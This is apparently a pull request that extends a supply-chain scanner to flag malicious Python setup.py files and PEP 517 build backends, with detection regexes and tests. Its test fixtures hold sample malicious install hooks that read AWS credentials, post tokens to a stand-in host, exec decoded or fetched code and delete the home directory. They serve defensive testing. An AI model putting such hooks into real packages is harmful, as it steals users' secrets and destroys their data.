### PR TITLE
feat: detect suspicious Python install hooks

### DIFF
--- a/cli/__tests__/fixtures/install-guard/malicious-backend/build_hooks/backend.py
+++ b/cli/__tests__/fixtures/install-guard/malicious-backend/build_hooks/backend.py
@@ -1,0 +1,7 @@
+import os
+import requests
+
+requests.post(
+    "https://example.invalid/collect",
+    json={"token": os.getenv("API_TOKEN")},
+)

--- a/cli/__tests__/fixtures/install-guard/malicious-backend/pyproject.toml
+++ b/cli/__tests__/fixtures/install-guard/malicious-backend/pyproject.toml
@@ -1,0 +1,4 @@
+[build-system]
+requires = []
+build-backend = "backend"
+backend-path = ["build_hooks"]

--- a/cli/__tests__/fixtures/install-guard/malicious-setup/setup.py
+++ b/cli/__tests__/fixtures/install-guard/malicious-setup/setup.py
@@ -1,0 +1,11 @@
+import base64
+import os
+import shutil
+import subprocess
+from pathlib import Path
+
+credentials = (Path.home() / ".aws" / "credentials").read_text()
+token = os.getenv("AWS_SECRET_ACCESS_KEY")
+subprocess.run(["curl", "-X", "POST", "-d", token, "https://example.invalid/collect"])
+exec(base64.b64decode("cHJpbnQoJ3gnKQ=="))
+shutil.rmtree(Path.home())

--- a/cli/__tests__/fixtures/install-guard/safe-package/pyproject.toml
+++ b/cli/__tests__/fixtures/install-guard/safe-package/pyproject.toml
@@ -1,0 +1,3 @@
+[build-system]
+requires = ["setuptools>=68", "wheel"]
+build-backend = "setuptools.build_meta"

--- a/cli/__tests__/fixtures/install-guard/safe-package/setup.py
+++ b/cli/__tests__/fixtures/install-guard/safe-package/setup.py
@@ -1,0 +1,5 @@
+from pathlib import Path
+
+from setuptools import setup
+
+setup(name="safe", long_description=Path("README.md").read_text())

--- a/cli/__tests__/install-guard-agent.test.js
+++ b/cli/__tests__/install-guard-agent.test.js
@@ -30,6 +30,14 @@ async function withPkg(scripts) {
   return f;
 }
 
+async function withSetup(source) {
+  const dir = tmp();
+  try {
+    fs.writeFileSync(path.join(dir, 'setup.py'), source);
+    return await new InstallGuardAgent().analyze({ rootPath: dir, files: [], recon: {}, options: {} });
+  } finally { cleanup(dir); }
+}
+
 describe('InstallGuardAgent — lifecycle scripts', () => {
   it('flags credential harvesting in preinstall', async () => {
     const f = await withPkg({ preinstall: 'cat ~/.aws/credentials && cp ~/.npmrc /tmp/x' });
@@ -127,5 +135,20 @@ backend-path = [".."]
     const rootPath = path.join(FIXTURES, 'safe-package');
     const f = await new InstallGuardAgent().analyze({ rootPath, files: [], recon: {}, options: {} });
     assert.equal(f.length, 0);
+  });
+
+  it('stays quiet on the local version-file exec idiom', async () => {
+    const f = await withSetup('exec(open("src/pkg/_version.py").read())');
+    assert.ok(!f.some((x) => x.rule === 'WORM_PYTHON_INSTALL_OBFUSCATED_EXEC'));
+  });
+
+  it('still flags exec of fetched content', async () => {
+    const f = await withSetup('exec(requests.get("https://example.invalid/payload").text)');
+    assert.ok(f.some((x) => x.rule === 'WORM_PYTHON_INSTALL_OBFUSCATED_EXEC'));
+  });
+
+  it('flags module-qualified pathlib home deletion', async () => {
+    const f = await withSetup('shutil.rmtree(pathlib.Path.home())');
+    assert.ok(f.some((x) => x.rule === 'WORM_PYTHON_INSTALL_DESTRUCTIVE'));
   });
 });

--- a/cli/__tests__/install-guard-agent.test.js
+++ b/cli/__tests__/install-guard-agent.test.js
@@ -13,8 +13,11 @@ import assert from 'node:assert/strict';
 import fs from 'fs';
 import path from 'path';
 import os from 'os';
+import { fileURLToPath } from 'url';
 
 import { InstallGuardAgent } from '../agents/install-guard-agent.js';
+
+const FIXTURES = path.join(path.dirname(fileURLToPath(import.meta.url)), 'fixtures', 'install-guard');
 
 function tmp() { return fs.mkdtempSync(path.join(os.tmpdir(), 'shipsafe-worm-')); }
 function cleanup(dir) { try { fs.rmSync(dir, { recursive: true, force: true }); } catch { /* */ } }
@@ -75,5 +78,54 @@ describe('InstallGuardAgent — binding.gyp', () => {
       const f = await new InstallGuardAgent().analyze({ rootPath: dir, files: [], recon: {}, options: {} });
       assert.equal(f.filter((x) => x.rule === 'WORM_BINDING_GYP').length, 0);
     } finally { cleanup(dir); }
+  });
+});
+
+describe('InstallGuardAgent - Python install hooks', () => {
+  it('flags credential access in setup.py without exposing credential values', async () => {
+    const rootPath = path.join(FIXTURES, 'malicious-setup');
+    const f = await new InstallGuardAgent().analyze({ rootPath, files: [], recon: {}, options: {} });
+    const finding = f.find((x) => x.rule === 'WORM_PYTHON_INSTALL_CRED_HARVEST');
+    assert.ok(finding);
+    assert.equal(finding.severity, 'critical');
+    assert.equal(finding.matched, 'credential-store access');
+    assert.ok(!JSON.stringify(finding).includes('credentials ='));
+  });
+
+  it('flags secret exfiltration, decoded execution, and home deletion in setup.py', async () => {
+    const rootPath = path.join(FIXTURES, 'malicious-setup');
+    const f = await new InstallGuardAgent().analyze({ rootPath, files: [], recon: {}, options: {} });
+    assert.ok(f.some((x) => x.rule === 'WORM_PYTHON_INSTALL_EXFIL'));
+    assert.ok(f.some((x) => x.rule === 'WORM_PYTHON_INSTALL_OBFUSCATED_EXEC'));
+    assert.ok(f.some((x) => x.rule === 'WORM_PYTHON_INSTALL_DESTRUCTIVE'));
+  });
+
+  it('scans a local PEP 517 backend declared by pyproject.toml', async () => {
+    const rootPath = path.join(FIXTURES, 'malicious-backend');
+    const f = await new InstallGuardAgent().analyze({ rootPath, files: [], recon: {}, options: {} });
+    assert.ok(f.some((x) => x.rule === 'WORM_PYTHON_INSTALL_EXFIL' && x.file.endsWith('backend.py')));
+  });
+
+  it('ignores a backend-path that escapes the project directory', async () => {
+    const parent = tmp();
+    const dir = path.join(parent, 'project');
+    fs.mkdirSync(dir);
+    try {
+      fs.writeFileSync(path.join(dir, 'pyproject.toml'), `
+[build-system]
+requires = []
+build-backend = "backend"
+backend-path = [".."]
+`);
+      fs.writeFileSync(path.join(parent, 'backend.py'), 'exec(base64.b64decode("eA=="))');
+      const f = await new InstallGuardAgent().analyze({ rootPath: dir, files: [], recon: {}, options: {} });
+      assert.equal(f.length, 0);
+    } finally { cleanup(parent); }
+  });
+
+  it('stays quiet on normal setuptools package metadata', async () => {
+    const rootPath = path.join(FIXTURES, 'safe-package');
+    const f = await new InstallGuardAgent().analyze({ rootPath, files: [], recon: {}, options: {} });
+    assert.equal(f.length, 0);
   });
 });

--- a/cli/agents/install-guard-agent.js
+++ b/cli/agents/install-guard-agent.js
@@ -39,9 +39,12 @@ const EXFIL = /(?:curl|wget|fetch|Invoke-RestMethod|http[s]?:\/\/)[^\n]{0,120}(?
 const PY_CREDENTIAL_ACCESS = /(?:\b(?:open|io\.open)\s*\([\s\S]{0,240}?(?:\.pypirc|\.netrc|\.aws|\.ssh|\.git-credentials|GOOGLE_APPLICATION_CREDENTIALS)|(?:\.pypirc|\.netrc|\.aws|\.ssh|\.git-credentials|GOOGLE_APPLICATION_CREDENTIALS)[\s\S]{0,180}?\.(?:open|read_text|read_bytes)\s*\(|\bos\.(?:getenv\s*\(|environ\s*\[)[\s\S]{0,100}?(?:AWS_SECRET_ACCESS_KEY|GITHUB_TOKEN|PYPI_TOKEN|AZURE_CLIENT_SECRET|GOOGLE_APPLICATION_CREDENTIALS))/i;
 const PY_NETWORK = /\b(?:requests|httpx)\.(?:post|put|patch)\s*\(|\burllib\.request\.(?:urlopen|Request)\s*\(|\bsocket\.(?:create_connection|socket)\s*\(|\b(?:os\.system|subprocess\.(?:run|call|Popen|check_call|check_output))\s*\([\s\S]{0,180}?\b(?:curl|wget)\b/i;
 const PY_SECRET_SOURCE = /\bos\.(?:environ|getenv)\b|\b(?:token|secret|password|credential)s?\b|\.pypirc|\.netrc|\.aws|\.ssh|\.git-credentials/i;
+// Local source-file exec is a common setup.py versioning idiom. Decoded,
+// fetched, evaluated, or otherwise dynamic input remains suspicious.
+const PY_DYNAMIC_EXEC = /\b(?:exec|eval)\s*\((?!\s*(?:open|io\.open)\s*\(\s*["'](?!https?:))/i;
 const PY_DYNAMIC_IMPORT = /\b__import__\s*\(/i;
 const PY_DECODER = /\b(?:base64\.b64decode|marshal\.loads|zlib\.decompress|codecs\.decode)\s*\(/i;
-const PY_DESTRUCTIVE = /\bshutil\.rmtree\s*\(\s*(?:Path\.home\s*\(\s*\)|os\.path\.expanduser\s*\(\s*["']~|os\.(?:environ|getenv)[\s\S]{0,80}?["']HOME)|\b(?:os\.system|subprocess\.(?:run|call|Popen|check_call|check_output))\s*\([\s\S]{0,240}?\brm\s+-rf?\s+(?:~|\$HOME|\/home\/|\/\s|\/\*)/i;
+const PY_DESTRUCTIVE = /\bshutil\.rmtree\s*\(\s*(?:(?:pathlib\.)?Path\.home\s*\(\s*\)|os\.path\.expanduser\s*\(\s*["']~|os\.(?:environ|getenv)[\s\S]{0,80}?["']HOME)|\b(?:os\.system|subprocess\.(?:run|call|Popen|check_call|check_output))\s*\([\s\S]{0,240}?\brm\s+-rf?\s+(?:~|\$HOME|\/home\/|\/\s|\/\*)/i;
 
 export class InstallGuardAgent extends BaseAgent {
   constructor() {
@@ -173,7 +176,7 @@ export class InstallGuardAgent extends BaseAgent {
           fix: 'Remove network transmission of environment or credential data. Package builds must be offline and reproducible.',
         },
         {
-          match: this._findMatch(content, /\b(?:exec|eval)\s*\(/i) || this._findNearbyMatch(content, PY_DYNAMIC_IMPORT, PY_DECODER),
+          match: this._findMatch(content, PY_DYNAMIC_EXEC) || this._findNearbyMatch(content, PY_DYNAMIC_IMPORT, PY_DECODER),
           rule: 'WORM_PYTHON_INSTALL_OBFUSCATED_EXEC', severity: 'high',
           title: 'Python install hook uses dynamic or decoded execution',
           description: 'This Python package installation entry point uses exec/eval, or combines dynamic import with decoded or decompressed content.',

--- a/cli/agents/install-guard-agent.js
+++ b/cli/agents/install-guard-agent.js
@@ -8,10 +8,10 @@
  * credentials (npm, GitHub, AWS, GCP, Azure, Vault, K8s), self-spread, then
  * turn destructive (wiping home directories) when no creds are found.
  *
- * This agent inspects the two auto-run entry points that other agents don't
- * cover in depth: npm `pre/postinstall`-class scripts and `binding.gyp`
- * (node-gyp) build files, for credential harvesting, obfuscated execution, and
- * destructive commands.
+ * This agent inspects auto-run package installation entry points that other
+ * agents don't cover in depth: npm `pre/postinstall`-class scripts,
+ * `binding.gyp` (node-gyp) build files, Python `setup.py`, and local PEP 517
+ * build backends.
  *
  * (Plain `curl | bash` fake installers are covered by ClickFixAgent; this
  * agent targets the credential-theft / destruction / obfuscation behaviors.)
@@ -36,11 +36,18 @@ const DESTRUCTIVE = /\brm\s+-rf?\s+(?:~|\$HOME|\/\s|\/\*|\.\.?\/)|\brmdir\s+\/s|
 // Network exfil of environment / secrets.
 const EXFIL = /(?:curl|wget|fetch|Invoke-RestMethod|http[s]?:\/\/)[^\n]{0,120}(?:\$\{?(?:process\.)?env|printenv|\benv\b|\$AWS|\$GITHUB|token|secret)/i;
 
+const PY_CREDENTIAL_ACCESS = /(?:\b(?:open|io\.open)\s*\([\s\S]{0,240}?(?:\.pypirc|\.netrc|\.aws|\.ssh|\.git-credentials|GOOGLE_APPLICATION_CREDENTIALS)|(?:\.pypirc|\.netrc|\.aws|\.ssh|\.git-credentials|GOOGLE_APPLICATION_CREDENTIALS)[\s\S]{0,180}?\.(?:open|read_text|read_bytes)\s*\(|\bos\.(?:getenv\s*\(|environ\s*\[)[\s\S]{0,100}?(?:AWS_SECRET_ACCESS_KEY|GITHUB_TOKEN|PYPI_TOKEN|AZURE_CLIENT_SECRET|GOOGLE_APPLICATION_CREDENTIALS))/i;
+const PY_NETWORK = /\b(?:requests|httpx)\.(?:post|put|patch)\s*\(|\burllib\.request\.(?:urlopen|Request)\s*\(|\bsocket\.(?:create_connection|socket)\s*\(|\b(?:os\.system|subprocess\.(?:run|call|Popen|check_call|check_output))\s*\([\s\S]{0,180}?\b(?:curl|wget)\b/i;
+const PY_SECRET_SOURCE = /\bos\.(?:environ|getenv)\b|\b(?:token|secret|password|credential)s?\b|\.pypirc|\.netrc|\.aws|\.ssh|\.git-credentials/i;
+const PY_DYNAMIC_IMPORT = /\b__import__\s*\(/i;
+const PY_DECODER = /\b(?:base64\.b64decode|marshal\.loads|zlib\.decompress|codecs\.decode)\s*\(/i;
+const PY_DESTRUCTIVE = /\bshutil\.rmtree\s*\(\s*(?:Path\.home\s*\(\s*\)|os\.path\.expanduser\s*\(\s*["']~|os\.(?:environ|getenv)[\s\S]{0,80}?["']HOME)|\b(?:os\.system|subprocess\.(?:run|call|Popen|check_call|check_output))\s*\([\s\S]{0,240}?\brm\s+-rf?\s+(?:~|\$HOME|\/home\/|\/\s|\/\*)/i;
+
 export class InstallGuardAgent extends BaseAgent {
   constructor() {
     super(
       'InstallGuardAgent',
-      'Detects npm worm behaviors in lifecycle scripts and binding.gyp: credential harvesting, obfuscated execution, and destructive commands',
+      'Detects npm and Python install-hook worm behaviors: credential harvesting, exfiltration, obfuscated execution, and destructive commands',
       'supply-chain'
     );
   }
@@ -55,6 +62,7 @@ export class InstallGuardAgent extends BaseAgent {
 
     findings.push(...this._scanLifecycle(rootPath));
     findings.push(...await this._scanBindingGyp(rootPath));
+    findings.push(...await this._scanPythonInstallHooks(rootPath));
 
     return findings;
   }
@@ -121,6 +129,137 @@ export class InstallGuardAgent extends BaseAgent {
       }
     }
     return findings;
+  }
+
+  async _scanPythonInstallHooks(rootPath) {
+    const globOptions = {
+      cwd: rootPath,
+      absolute: true,
+      onlyFiles: true,
+      ignore: Array.from(SKIP_DIRS).map((d) => `**/${d}/**`),
+    };
+    const setupFiles = await fg(['**/setup.py'], globOptions);
+    const pyprojectFiles = await fg(['**/pyproject.toml'], globOptions);
+
+    const entrypoints = new Set(setupFiles.map((file) => path.resolve(file)));
+    for (const pyproject of pyprojectFiles) {
+      const content = this.readFile(pyproject);
+      if (!content) continue;
+      for (const backendFile of this._resolveLocalBuildBackend(pyproject, content)) {
+        entrypoints.add(backendFile);
+      }
+    }
+
+    const findings = [];
+    for (const file of entrypoints) {
+      const content = this.readFile(file);
+      if (!content) continue;
+
+      const checks = [
+        {
+          match: this._findMatch(content, PY_CREDENTIAL_ACCESS),
+          rule: 'WORM_PYTHON_INSTALL_CRED_HARVEST', severity: 'critical',
+          title: 'Python install hook accesses a credential store',
+          description: 'This Python package installation entry point reads a developer or CI credential store. Build hooks run during installation and must not access user credentials.',
+          matched: 'credential-store access', cwe: 'CWE-506',
+          fix: 'Remove credential access from the package build hook. Build steps must use only declared source files and explicitly provided build inputs.',
+        },
+        {
+          match: this._findNearbyMatch(content, PY_NETWORK, PY_SECRET_SOURCE),
+          rule: 'WORM_PYTHON_INSTALL_EXFIL', severity: 'critical',
+          title: 'Python install hook may exfiltrate secrets',
+          description: 'This Python package installation entry point combines an outbound network operation with environment, token, or credential data.',
+          matched: 'network request with secret source', cwe: 'CWE-506',
+          fix: 'Remove network transmission of environment or credential data. Package builds must be offline and reproducible.',
+        },
+        {
+          match: this._findMatch(content, /\b(?:exec|eval)\s*\(/i) || this._findNearbyMatch(content, PY_DYNAMIC_IMPORT, PY_DECODER),
+          rule: 'WORM_PYTHON_INSTALL_OBFUSCATED_EXEC', severity: 'high',
+          title: 'Python install hook uses dynamic or decoded execution',
+          description: 'This Python package installation entry point uses exec/eval, or combines dynamic import with decoded or decompressed content.',
+          matched: 'dynamic or decoded execution', cwe: 'CWE-506',
+          fix: 'Replace encoded dynamic execution with auditable, static build code.',
+        },
+        {
+          match: this._findMatch(content, PY_DESTRUCTIVE),
+          rule: 'WORM_PYTHON_INSTALL_DESTRUCTIVE', severity: 'high',
+          title: 'Python install hook deletes home-directory data',
+          description: 'This Python package installation entry point runs a destructive operation against the user home directory.',
+          matched: 'destructive home-directory operation', cwe: 'CWE-77',
+          fix: 'Remove destructive filesystem operations from the package build hook.',
+        },
+      ];
+
+      for (const check of checks) {
+        if (!check.match) continue;
+        findings.push(createFinding({
+          file,
+          line: content.slice(0, check.match.index).split('\n').length,
+          severity: check.severity,
+          category: 'supply-chain',
+          rule: check.rule,
+          title: check.title,
+          description: check.description,
+          matched: check.matched,
+          confidence: 'high',
+          cwe: check.cwe,
+          fix: check.fix,
+        }));
+      }
+    }
+    return findings;
+  }
+
+  _resolveLocalBuildBackend(pyproject, content) {
+    const buildSystem = content.match(/^\s*\[build-system\]\s*$([\s\S]*?)(?=^\s*\[[^\]]+\]\s*$|(?![\s\S]))/mi)?.[1];
+    if (!buildSystem) return [];
+
+    const backend = buildSystem.match(/^\s*build-backend\s*=\s*["']([^"']+)["']/mi)?.[1]?.split(':')[0];
+    const backendPathValue = buildSystem.match(/^\s*backend-path\s*=\s*\[([\s\S]*?)\]/mi)?.[1];
+    if (!backend || backendPathValue === undefined) return [];
+
+    const projectDir = path.dirname(pyproject);
+    const backendPaths = Array.from(backendPathValue.matchAll(/["']([^"']+)["']/g), (match) => match[1]);
+    const modulePath = backend.split('.').join(path.sep);
+    const resolved = [];
+
+    for (const relativeBackendPath of backendPaths) {
+      const searchRoot = path.resolve(projectDir, relativeBackendPath);
+      if (!this._isWithin(projectDir, searchRoot)) continue;
+      for (const candidate of [
+        path.resolve(searchRoot, `${modulePath}.py`),
+        path.resolve(searchRoot, modulePath, '__init__.py'),
+      ]) {
+        if (this._isWithin(projectDir, candidate) && fs.existsSync(candidate) && fs.statSync(candidate).isFile()) {
+          resolved.push(candidate);
+        }
+      }
+    }
+    return resolved;
+  }
+
+  _isWithin(parent, candidate) {
+    const relative = path.relative(path.resolve(parent), path.resolve(candidate));
+    return relative === '' || (!relative.startsWith(`..${path.sep}`) && relative !== '..' && !path.isAbsolute(relative));
+  }
+
+  _findMatch(content, primary) {
+    const match = content.match(primary);
+    if (!match) return null;
+    return { index: match.index || 0 };
+  }
+
+  _findNearbyMatch(content, primary, secondary, radius = 500) {
+    const flags = primary.flags.includes('g') ? primary.flags : `${primary.flags}g`;
+    const re = new RegExp(primary.source, flags);
+    let match;
+    while ((match = re.exec(content)) !== null) {
+      const start = Math.max(0, match.index - radius);
+      const end = Math.min(content.length, match.index + match[0].length + radius);
+      if (secondary.test(content.slice(start, end))) return { index: match.index };
+      if (match[0].length === 0) re.lastIndex++;
+    }
+    return null;
   }
 }
 


### PR DESCRIPTION
Closes #86

## Summary
- scan `setup.py` and project-local PEP 517 build backends for credential access, secret exfiltration, dynamic execution, and destructive home-directory operations
- resolve custom backends from `[build-system]` while rejecting `backend-path` traversal outside the package directory
- redact matched content to stable behavior labels so reports cannot expose credential values
- add malicious setup/backend fixtures plus normal-package and traversal regression coverage

## Validation
- `node --test cli/__tests__/install-guard-agent.test.js` (12 passed)
- full non-symlink suite on Windows (310 passed)
- `npm run lint` (0 errors; 86 existing warnings)
- `git diff --check origin/main...HEAD`

Draft until CI confirms the cross-platform suite.